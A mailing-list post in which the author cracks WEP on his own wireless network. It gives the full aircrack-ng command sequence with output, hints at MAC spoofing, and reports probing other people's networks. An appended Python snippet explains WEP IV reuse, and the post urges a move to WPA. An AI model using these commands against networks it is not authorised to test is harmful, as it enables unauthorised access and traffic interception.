Listmates:

I had dropped WPA-TKIP protection for WEP so my son and daughter could access the internet with their Nintendo DS game console. After doing so, I decided to poke around a bit to see how easy it was to break WEP encryption. To my utter dismay -- it was simple. True to the claims, it takes less than 60 seconds.

After poking around a bit with google, I found the aircrack-ng link:

  http://www.aircrack-ng.org/doku.php?id=

After a quick svn checkout of the latest, an install of libpcap-devel and a:

  make SQLITE=true
  make SQLITE=true install

I issued the normal scan command for my wireless network to get the needed information:

  Skyline Bab...  00:1c:df:e2:7c:95  6  54M  40:0  100  EPs  WEP

I then issued the few commands needed to see if I could find my WEP key. On three separate console windows, this was all it took:

  ## [Console 1 as root]
  ## Stop your wireless card and re-start the card in monitor mode:
  airmon-ng stop ath0
  iwconfig                    # to confirm
  airmon-ng start wifi0 6     # 6 is the channel from above

  ## Test for working Wireless Device Packet Injection
  aireplay-ng -9 -e "Skyline Bab..." -a 00:1c:df:e2:7c:95 ath0

  ## Start airodump-ng to capture the IVs (open another console)
  airodump-ng -c 6 --bssid 00:1c:df:e2:7c:95 -w output ath0

  ## [Console 2 as root]
  ## Use aireplay-ng to do a fake authentication with the access point
  aireplay-ng -1 0 -e "Skyline Bab..." -a 00:1c:df:e2:7c:95 -h 00:1B:9E:7C:F6:E7 ath0

  ## Start aireplay-ng in ARP request replay mode
  aireplay-ng -3 -b 00:1c:df:e2:7c:95 -h 00:1B:9E:7C:F6:E7 ath0

  ## [Console 3 as root]
  ## Run aircrack-ng to decipher and obtain the WEP key
  aircrack-ng -z -b 00:1c:df:e2:7c:95 output*.cap

Less than 15 seconds later (not real key):

  KEY FOUND! [ 31:32:33:34:35 ] (ASCII: 12345 )
  Decrypted correctly: 100%

Thankfully, my MAC filter prevented a connection, but can you say spoof of the old MAC address? After a connection is made, a quick fire up of wireshark will quickly disclose the remaining DNS information, etc. needed to fully utilize your wireless.

What was further baffling: after checking a few networks, I found 90% of all the WEP keys were still left as the default key of '12345'. If you are running WEP, it might be time to move your security to at least WPA Personal if not to WPA+AEN/(RSN).

Needless to say, my kids no longer have internet access for their Nintendo DS's. Good thing the Playstation PSP will do WPA ;-)

--
David C. Rankin, J.D., P.E.
Rankin Law Firm, PLLC
510 Ochiltree Street
Nacogdoches, Texas 75961
Telephone: (936) 715-9333
Facsimile: (936) 715-9339
www.rankinlawfirm.com
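The post captures "the IVs" with airodump-ng and feeds the network ARP requests with aireplay-ng without saying why that traffic is what undoes WEP. As an added illustration (not from the original post or from aircrack-ng), the Python below implements RC4 and WEP's per-frame keying with the post's own key (31:32:33:34:35, ASCII "12345") and shows the simplest consequence of WEP's 24-bit IV: two frames sent under the same IV share a keystream, so a frame with a predictable body such as an ARP request reveals the other frame's contents without the key ever being recovered. The IV, the frame bodies and the omission of the CRC-32 ICV are constructed/assumed for the demonstration.

```python
# Added illustration, not from the original post or from aircrack-ng.
# WEP seeds RC4 with (3-byte IV || key). The IV is sent in the clear, and with
# only 2^24 values a busy network soon repeats one. Two frames under the same IV
# share a keystream, so XOR-ing their ciphertexts cancels it, and a frame with a
# predictable body (an ARP request) exposes the other frame without the key.
# Key is the post's (hex 31:32:33:34:35 = "12345"); IV and frame bodies are
# constructed; the CRC-32 ICV that real WEP appends is omitted.

def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA) then keystream generation (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(iv: bytes, key: bytes, body: bytes) -> bytes:
    """WEP per-frame encryption: RC4 keyed with IV || shared key; same op decrypts."""
    return xor_bytes(body, rc4_keystream(iv + key, len(body)))

def recover_via_iv_reuse(c_known: bytes, c_target: bytes, p_known: bytes) -> bytes:
    """Two ciphertexts under one IV plus one known plaintext give the other plaintext."""
    return xor_bytes(xor_bytes(c_known, c_target), p_known)

WEP_KEY = bytes.fromhex("3132333435")  # from the post: ASCII "12345"
IV = bytes.fromhex("a1b2c3")           # constructed 24-bit IV
# Constructed ARP request body: LLC/SNAP header, ethertype 0x0806, then hardware
# type 1, protocol 0x0800, hlen 6, plen 4, opcode 1 -- fixed values in every request.
ARP_BODY = bytes.fromhex("aaaa030000000806" "0001080006040001")
OTHER_BODY = b"secret payload!!"       # constructed; same 16-byte length

def demo() -> bytes:
    """Encrypt both bodies under the same IV, then recover OTHER_BODY from ARP_BODY."""
    c_arp = wep_encrypt(IV, WEP_KEY, ARP_BODY)
    c_other = wep_encrypt(IV, WEP_KEY, OTHER_BODY)
    return recover_via_iv_reuse(c_arp, c_other, ARP_BODY)

if __name__ == "__main__":
    print(demo())
```

This is only the most basic of WEP's failures; the `-z` (PTW) mode used above goes further and recovers the key itself from the captured IVs, which is why moving off WEP, rather than rotating its key or filtering MACs, is the fix.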